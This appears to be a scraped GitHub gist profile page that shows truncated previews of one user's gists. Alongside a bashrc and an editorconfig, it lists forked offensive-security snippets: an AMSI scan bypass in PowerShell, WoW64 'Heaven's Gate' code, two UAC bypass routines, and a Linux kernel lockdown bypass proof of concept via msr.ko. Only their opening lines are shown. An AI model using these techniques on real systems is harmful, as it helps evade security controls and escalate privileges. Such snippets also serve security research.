Skip to content

Instantly share code, notes, and snippets.

View SkyN9ne's full-sized avatar
💚

SkyN9ne SkyN9ne

💚
View GitHub Profile
@SkyN9ne
SkyN9ne / UbuntuWSL-bashrc.SH
Last active June 22, 2024 09:57
A bash.bashrc configuration file. Designed originally for usage on Ubuntu
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
#!/usr/bin/env bash
PREFIX=${PREFIX:-/usr/local}
set -eo pipefail
if ! which gh >/dev/null; then
echo "gh is not installed. Please install gh and try again."
echo "See https://github.com/cli/cli"
exit 1
@SkyN9ne
SkyN9ne / .editorconfig
Last active June 3, 2024 20:33 — forked from cmbaughman/.editorconfig
Editor Config
[*]
charset = utf-8
end_of_line = lf
indent_size = 2
indent_style = space
insert_final_newline = true
trim_trailing_whitespace = true
quote_type = single
### Frontend files
@SkyN9ne
SkyN9ne / amsi-bypass.ps1
Last active June 1, 2024 20:25 — forked from FatRodzianko/my-am-bypass.ps1
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
@SkyN9ne
SkyN9ne / deobfuscate.py
Last active June 1, 2024 11:31 — forked from AmgdGocha/deobfuscation.py
Deobfuscates strings
#!/usr/bin/env python
def deobfuscate_strings(numbers_string, substract_number):
result = ''
numbers_list = numbers_string.split('.')
for number in numbers_list:
result = result + chr(int(number) - int(substract_number))
@cmbaughman
cmbaughman / .editorconfig
Created May 29, 2024 19:14
Editor Config
[*]
charset = utf-8
end_of_line = lf
indent_size = 2
indent_style = space
insert_final_newline = true
trim_trailing_whitespace = true
quote_type = single
### Frontend files
@SkyN9ne
SkyN9ne / WoW64_call.cpp
Created May 22, 2024 02:25 — forked from Cr4sh/WoW64_call.cpp
WoW64 Heaven's Gate
#include "stdafx.h"
#define DB(_val_) __asm __emit (_val_)
#define INVALID_SYSCALL (DWORD)(-1)
// code selectors
#define CS_32 0x23
#define CS_64 0x33
void TestCopy()
{
BOOL cond = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *isrc = NULL, *idst = NULL;
BIND_OPTS3 bop;
SHELLEXECUTEINFOW shexec;
HRESULT r;
do {
@SkyN9ne
SkyN9ne / UAC-TokenMagic.ps1
Created May 22, 2024 02:21 — forked from Cr4sh/UAC-TokenMagic.ps1
UAC Token Magic
function UAC-TokenMagic {
<#
.SYNOPSIS
Based on James Forshaw's three part post on UAC, linked below, and possibly a technique
used by the CIA!
Essentially we duplicate the token of an elevated process, lower it's mandatory
integrity level, use it to create a new restricted token, impersonate it and
use the Secondary Logon service to spawn a new process with High IL. Like
playing hide-and-go-seek with tokens! ;))
@SkyN9ne
SkyN9ne / expl_msr_ko.py
Created May 22, 2024 02:19 — forked from Cr4sh/expl_msr_ko.py
msr.ko Linux kernel lockdown bypass PoC
import sys, os, mmap, subprocess
from struct import pack, unpack
from ctypes import *
IA32_SYSENTER_ESP = 0x175
IA32_SYSENTER_EIP = 0x176
class PyObj(Structure):
_fields_ = [( 'ob_refcnt', c_size_t ),